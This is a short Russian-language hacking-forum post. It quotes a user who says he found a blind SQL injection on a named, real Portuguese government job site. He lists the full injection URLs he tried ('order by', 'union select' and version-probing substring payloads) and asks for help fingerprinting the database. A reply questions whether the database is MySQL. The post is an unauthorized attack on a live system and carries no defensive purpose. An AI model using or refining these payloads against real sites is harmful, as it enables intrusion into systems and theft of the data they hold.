
26.03.2009, 15:59
|
|
Новичок
Регистрация: 26.11.2008
Сообщений: 1
Провел на форуме: 4317
Репутация:
0
|
|
Сообщение от Imperou$
Нашёл блинд инж, подобрал поля
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+order+by+2--
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+union+select+1,2--
не пашет )':, видимо двойной запрос.
http://www.netemprego.imigrante.gov.pt/IEFP/cv/pageNUTSII.jsp?nutsI=100'+and+substring(version(), 1,1)=5--
+and+substring(version(),1,1)=4--
+and+substring(version(),1,1)=3--
так же результатов не дало.
Помогите хотя бы определить версию.
Подзапросы не работают у меня вообще! =(
А почему ты решил что это вообще MySQL?.
|
|
|